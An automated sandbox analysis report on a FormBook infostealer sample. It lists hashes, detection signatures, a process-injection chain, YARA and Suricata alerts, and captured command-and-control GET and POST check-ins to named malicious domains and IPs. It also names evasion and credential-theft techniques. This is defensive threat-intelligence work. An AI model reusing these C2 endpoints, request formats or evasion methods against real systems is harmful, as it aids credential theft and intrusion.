Windows Analysis Report
NFhRxwbegd.exe

Overview

General Information

Sample name: NFhRxwbegd.exe (renamed because original name is a hash value)
Original sample name: d26c248791d7c1347e8e21257ad5522c1e47e26e054a59bc61a50133e5d180d6.exe
Analysis ID: 1588097
MD5: 7b4d6f3b6a3b509738048774b20fad27
SHA1: 4e96c226734aa7a5df5910efb87542bfb671674f
SHA256: d26c248791d7c1347e8e21257ad5522c1e47e26e054a59bc61a50133e5d180d6
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NFhRxwbegd.exe (PID: 2488 cmdline: "C:\Users\user\Desktop\NFhRxwbegd.exe" MD5: 7B4D6F3B6A3B509738048774B20FAD27)
    • NFhRxwbegd.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\NFhRxwbegd.exe" MD5: 7B4D6F3B6A3B509738048774B20FAD27)
      • gsolWhsjddFW.exe (PID: 2948 cmdline: "C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ieUnatt.exe (PID: 5608 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
          • gsolWhsjddFW.exe (PID: 2496 cmdline: "C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5024 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 5.2.NFhRxwbegd.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 5.2.NFhRxwbegd.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

No Sigma rule has matched


                AV Detection

                Source: NFhRxwbegd.exe | Avira: detected
                Source: https://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN | Avira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jR | Avira URL Cloud: Label: malware
                Source: http://www.happyjam.life/4t49/?bJMLqbS=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=&xHrti=IpSlbxE0jR | Avira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/?bJMLqbS=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&xHrti=IpSlbxE0jR | Avira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/ | Avira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qt4m/ | Avira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qt4m/?bJMLqbS=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&xHrti=IpSlbxE0jR | Avira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/ | Avira URL Cloud: Label: malware
                Source: http://www.happyjam.life/4t49/ | Avira URL Cloud: Label: malware
                Source: NFhRxwbegd.exe | Virustotal: Detection: 76%
                Source: NFhRxwbegd.exe | ReversingLabs: Detection: 78%
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: NFhRxwbegd.exe | Joe Sandbox ML: detected
                Source: NFhRxwbegd.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: NFhRxwbegd.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001467000.00000004.00000020.00020000.00000000.sdmp, NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2762247141.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gsolWhsjddFW.exe, 00000007.00000002.4082242168.000000000049E000.00000002.00000001.01000000.0000000C.sdmp, gsolWhsjddFW.exe, 00000009.00000000.2628798758.000000000049E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001467000.00000004.00000020.00020000.00000000.sdmp, NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2762247141.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2562941054.0000000004E92000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2560752916.0000000004CED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NFhRxwbegd.exe, NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2562941054.0000000004E92000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2560752916.0000000004CED000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_02F7CC50 FindFirstFileW,FindNextFileW,FindClose, | 8_2_02F7CC50
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 4x nop then xor eax, eax | 8_2_02F69F60
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 4x nop then mov ebx, 00000004h | 8_2_053904E8

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64224 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64218 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64237 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64238 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64231 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64231 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64240 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64240 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64223 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64228 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64253 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64230 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64227 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64227 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64226 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64219 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64221 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64221 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64236 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64236 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64252 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64252 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64248 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64248 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64216 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64216 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64233 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64251 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64234 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64232 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64239 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64250 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64229 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64241 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64244 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64244 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64220 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64254 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64249 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64242 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64246 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64245 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64243 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64247 -> 208.91.197.27:80
                Source: DNS query: www.aziziyeescortg.xyz
                Source: global trafficTCP traffic: 192.168.2.6:64211 -> 162.159.36.2:53
                Source: Joe Sandbox View | IP Address: 77.68.64.45
                Source: Joe Sandbox View | IP Address: 104.21.16.1
                Source: Joe Sandbox View | IP Address: 209.74.77.107
                Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
                Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /vt4e/?bJMLqbS=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY=&xHrti=IpSlbxE0jR HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.7261ltajbc.bond | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: GET /bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jR HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.muasamgiare.click | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: GET /86am/?bJMLqbS=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&xHrti=IpSlbxE0jR HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.kkpmoneysocial.top | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: GET /4t49/?bJMLqbS=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=&xHrti=IpSlbxE0jR HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.happyjam.life | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: GET /vc3u/?bJMLqbS=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&xHrti=IpSlbxE0jR HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.123hellodrive.shop | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: GET /k6vm/?xHrti=IpSlbxE0jR&bJMLqbS=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.zoomlive.live | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: GET /725g/?bJMLqbS=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&xHrti=IpSlbxE0jR HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.dietcoffee.online | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: GET /v2ut/?xHrti=IpSlbxE0jR&bJMLqbS=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLIzhxo/qMOX8MgFiq9bThHJniXb4lO04jER0alxiz9odaEmB/xSI= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.guacamask.online | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: GET /qt4m/?bJMLqbS=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&xHrti=IpSlbxE0jR HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.appsolucao.shop | Connection: close | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficDNS traffic detected: DNS query: www.7261ltajbc.bond
                Source: global trafficDNS traffic detected: DNS query: www.muasamgiare.click
                Source: global trafficDNS traffic detected: DNS query: www.kkpmoneysocial.top
                Source: global trafficDNS traffic detected: DNS query: www.artkub.net
                Source: global trafficDNS traffic detected: DNS query: www.happyjam.life
                Source: global trafficDNS traffic detected: DNS query: www.123hellodrive.shop
                Source: global trafficDNS traffic detected: DNS query: www.zoomlive.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.guacamask.online
                Source: global trafficDNS traffic detected: DNS query: www.appsolucao.shop
                Source: global trafficDNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: unknown | HTTP traffic detected: POST /bsye/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Host: www.muasamgiare.click | Cache-Control: max-age=0 | Content-Type: application/x-www-form-urlencoded | Content-Length: 212 | Connection: close | Origin: http://www.muasamgiare.click | Referer: http://www.muasamgiare.click/bsye/ | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 | Data Ascii: bJMLqbS=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4VDvKMWbFEA/KPn42K/VJZ3YKbVSBErNOTMKkQDOBKN1
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 20:31:06 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:31:58 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:32:01 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 20:32:03 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
